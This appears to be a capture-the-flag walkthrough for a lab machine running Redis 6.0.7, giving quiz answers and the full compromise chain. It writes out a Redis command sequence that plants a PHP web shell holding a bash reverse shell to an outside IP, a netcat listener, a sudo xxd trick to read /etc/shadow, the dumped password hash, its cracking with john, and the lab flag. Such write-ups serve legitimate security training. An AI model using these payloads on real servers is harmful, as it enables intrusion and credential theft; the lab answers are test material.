BOOK THIS SPACE FOR AD
ARTICLE AD1. Scan the machine, how many ports are open?
Ans: 22. What’s is the database management system installed on the server?
Ans: redis3. What port is the database management system running on?
Ans: 63794. What’s is the version of management system installed on the server?
Ans: 6.0.75. Compromise the machine and locate user.txt
Let’s Connect with redis-cli using the below syntax
redis-cli -h <Machine-IP>We found a Username — vianka, so let’s Enumerate Further
Let’s try to Upload a Reverse Shell using the Following Commands inside the redis-cliconfig set dir /var/www/htmlconfig set dbfilename shell.php
set test "<?php exec(\"/bin/bash -c 'bash -i > /dev/tcp/10.11.36.171/4444 0>&1'\"); ?>"
save
2. Now, let’s start a netcat listener using the Following Command
nc -lvp 44443. Then Navigate to http://<Machine-IP>/shell.php
6. What is the local user account password?
On Analysing GTFObins we found a binary to read files with sudo permissions,
So let’s first make our shell interactive with the python commandThen we try to read /etc/shadow file using the Following Commands$ python3 -c "import pty; pty.spawn('/bin/bash')"$ LFILE=/etc/shadow
$ /usr/bin/xxd "$LFILE" | /usr/bin/xxd -r
root:!:18507:0:99999:7:::
daemon:*:17953:0:99999:7:::
bin:*:17953:0:99999:7:::
sys:*:17953:0:99999:7:::
sync:*:17953:0:99999:7:::
games:*:17953:0:99999:7:::
man:*:17953:0:99999:7:::
lp:*:17953:0:99999:7:::
mail:*:17953:0:99999:7:::
news:*:17953:0:99999:7:::
uucp:*:17953:0:99999:7:::
proxy:*:17953:0:99999:7:::
www-data:*:17953:0:99999:7:::
backup:*:17953:0:99999:7:::
list:*:17953:0:99999:7:::
irc:*:17953:0:99999:7:::
gnats:*:17953:0:99999:7:::
nobody:*:17953:0:99999:7:::
systemd-timesync:*:17953:0:99999:7:::
systemd-network:*:17953:0:99999:7:::
systemd-resolve:*:17953:0:99999:7:::
systemd-bus-proxy:*:17953:0:99999:7:::
syslog:*:17953:0:99999:7:::
_apt:*:17953:0:99999:7:::
messagebus:*:18506:0:99999:7:::
uuidd:*:18506:0:99999:7:::
vianka:$6$2p.tSTds$qWQfsXwXOAxGJUBuq2RFXqlKiql3jxlwEWZP6CWXm7kIbzR6WzlxHR.UHmi.hc1/TuUOUBo/jWQaQtGSXwvri0:18507:0:99999:7:::
3. Now copy and store the hash of vianka into a file named hash.txt in your system. (Make sure to check the hash if you paste the hash via the terminal)
4. Now Let’s use john to crack the password using the below command
$ john hash.txtUsing default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
beautiful1 (vianka)
Session completed.
Ans: beautiful17. Escalate privileges and obtain root.txt
Now Let’s Login as vianka with her password beautiful1 using the command su vianka and let’s check what commands vianka can run2. She can run all commands so lets sudo it
sudo sucat /root/root.txtAns: thm{xxd_pr1v_escalat1on}